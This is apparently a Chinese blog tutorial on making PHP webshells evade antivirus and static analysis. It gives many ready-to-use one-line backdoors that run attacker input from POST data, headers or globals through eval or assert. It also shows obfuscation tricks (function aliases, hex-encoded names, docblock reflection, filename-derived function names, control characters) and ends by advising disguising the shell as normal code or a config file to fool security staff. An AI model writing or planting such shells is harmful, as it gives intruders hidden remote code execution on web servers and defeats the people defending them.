Webshell 免杀

Webshell免杀

PHP常见的一句话木马

<?php
@eval($_POST["tunan"]);
?>
    
<?php
@assert($_POST[value]);
?>
    
<?php
$_GET[1]($_POST[2]);
?>

assert与eval

eval() 不能作为函数名动态执行代码，官方说明如下：eval 是一个语言构造器而不是一个函数，不能被可变函数调用。可变函数即我们上面的第三个代码。

所以我们一般传入的是

1=assert&2   或者  1=system&2=whoami

但是在php7之后，assert也和eval一样了，不能这样调用了。

绕过查杀软件

静态查杀，一般是寻找危险函数，然后通过回溯它的变量，如果存在POST等可控的传入，就进行查杀。

那么如果要绕过查杀，就可以有两个思路

• 找查杀软件没有记录在内的危险函数
• 修改变量，进行加密混淆等。

命令执行函数

eval，assert目标太大，可以换一些命令执行函数使用

• shell_exec()
• system()
• exec()
• passthru()
• 反引号 （反引号底层还是调用shell_exec()函数。）
• pcntl_exec()
• proc_open()

同时也可以关注一些其他获取输入的函数

• $_GET

• $_POST

• $_COOKIE

• $_REQUEST

• $_SERVER 其中的某些参数可控,如REQUEST_METHOD,QUERY_STRING,HTTP_USER_AGENT等

• $_FILE

• $GLOBALS

• getallheaders()

• get_defined_vars()

• get_defined_functions()

还有一些匿名函数，动态调用函数，回调函数。

对于$GLOBALS，这是一个数组，所以这里再介绍三个函数

• current() - 返回数组中的当前元素的值。
• next() - 返回数组中下一个元素的值
• end() - 返回数组中的最后一个元素

例

<?php
@eval($GLOBALS['_POST']['tunan']);
?>

<?php
@eval(getallheaders()['Referer']);	//获取请求头的Referer信息
?>

<?php
@eval($_SERVER['HTTP_ACCEPT_LANGUAGE']); //获取accept--Language信息
?>

<?php
eval(null.implode(reset(get_defined_vars()))); // a=phpinfo(); php>=5.4.45
?>

函数别名

php内置的函数别名（PHP7.4.3）

bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
DEP_FALIAS(gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers

内置函数别名绕过

mb_ereg_replace ===> mbereg_replace

mb_ereg_ireplace ===> mbereg_ireplace

<?php
mbereg_replace('.*','\0',$_POST["tunan"], 'e');
?>

我们也可以自己写函数别名进行绕过，如下

<?php
use function \assert as test;
test($_POST['tunan']);
?>

监控as语法，回溯这些函数或类，寻找真实名字在进行判断是否为危险函数。

类的继承与动态调用

拼接，简单加密

• substr()
• strtr()
• substr_replace()
• str_rot13()
• base64_encode()
• strrev()
• urlencode()
• bin2hex()
• pack()

……

利用取反，异或，拼接，进制转换，加解密，字符反转等来进行绕过

<?php
//参考https://www.freebuf.com/articles/web/155891.html中进制转换方式
$v230c590="\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145";
@eval(''.$v230c590(null.next(post($GLOBALS));
?>

利用注释符

ReflectionClass::getDocComment — 获取文档注释

<?php
/** 
assert
*/
class TestClass { }

$a = new ReflectionClass('TestClass');
$a = trim($a->getDocComment(),"\x00..\x2F");
$a($_POST['a']);
?>

利用文件名

利用文件名或者文件夹名

• dirname() 返回文件名

• $_SERVER[‘PHP_SELF’]

• $_SERVER[‘REQUEST_URI’] 访问此页面所需url

• $_SERVER[‘SCRIPT_FILENAME’] 当前执行脚本的绝对路径

文件名为system.php
<?php
$a =(__FILE__);
$b=substr($a,-10,-4);
$b($_POST['tunan']);
?>

函数与类的嵌套调用

<?php // copy from https://xz.aliyun.com/t/5152
function test($a,$b){
    array_map($a,$b);
}
test(assert,array($_POST['x']));
?>

<?php // copy from https://xz.aliyun.com/t/5152
class loveme {
    var $a;
    var $b;
    function __construct($a,$b) {
        $this->a=$a;
        $this->b=$b;
    }
    function test() {
       array_map($this->a,$this->b);
    }
}
$p1=new loveme(assert,array($_POST['x']));
$p1->test();
?>

利用一些特殊符号

最常见的是插入null，\n,\t等。

<?php
$a = null;
$b = $_POST['tunan'];
eval($a.$b)
?>

还有一种比较骚的姿势在函数调用中是插入一些控制符[\x00-\x20],PHP引擎会忽略这些控制字符,正确执行PHP函数

<?php
eval\x01\x02($_POST['tunan']); 
?>

最后，既然是🐎，伪装不仅需要骗过查杀工具，也要能骗的过安全人员，至少不能太明显，所以可以把🐎伪装成一个正常的功能，或者写一堆英文，让他以为是配置文件而忽略。

赏

谢谢你请我吃糖果